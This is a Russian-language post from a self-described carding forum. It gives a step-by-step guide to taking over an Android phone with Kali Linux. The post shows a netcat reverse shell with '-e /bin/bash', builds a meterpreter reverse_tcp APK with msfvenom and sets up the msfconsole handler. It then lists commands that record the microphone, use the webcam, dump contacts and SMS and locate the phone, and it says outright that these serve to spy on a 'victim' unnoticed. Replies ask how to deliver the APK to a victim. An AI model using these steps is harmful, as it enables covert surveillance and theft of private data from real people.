Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Получаем доступ к Android [kali Linux]

MiroslavchikPesron

Опытный user
Регистрация
10 Фев 2022
Сообщения
165
Реакции
7
Принцип работы:

Простыми словами, сначала создадем приложение(payload), в конце у нас будет сессия meterpreter. Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.

Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:
Код:


nc -l -p 8577

Жертва в свою очередь подключается к этому открытому порту:
Код:

Код:
nc 192.168.1.1 8577 -e /bin/bash

  • Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы.

  • Вот по такому принципу мы будет работать с android. Принцип работы с payload может быть намного сложнее, но в этом основная суть.
  • Создание payload

  • Открываем терминал и с помощью такого набора создаем приложение с расширением. apk, которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig:
Код:

Код:
msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R >shell.apk

  • После выполнения команды в корневой директории будет создан файл shell.apk.

Посмотреть вложение 1463

  • Далее необходимо запустить msfconsole.
Код:

Код:
msfconsole

После этого последовательно выполняем все команды:
Код:

Код:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST ВашIP
set LPORT 4444
exploit

  • После этого, человек должен запусить shell.apk.
Некоторые полезные команды:
Код:

Код:
record_mic
webcam_snap
webcam_stream
dump_contacts
dump_sms
geolocate

После установления сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение.
 

Torsten

Опытный user
Регистрация
7 Ноя 2021
Сообщения
961
Реакции
114
Выглядит сложно, но на выходных пропробую на своем провернуть.
 

Mastersam

Опытный user
Регистрация
20 Июл 2021
Сообщения
188
Реакции
8
Осталось придумать,как апк файл закинуть жертве
 
Сверху Снизу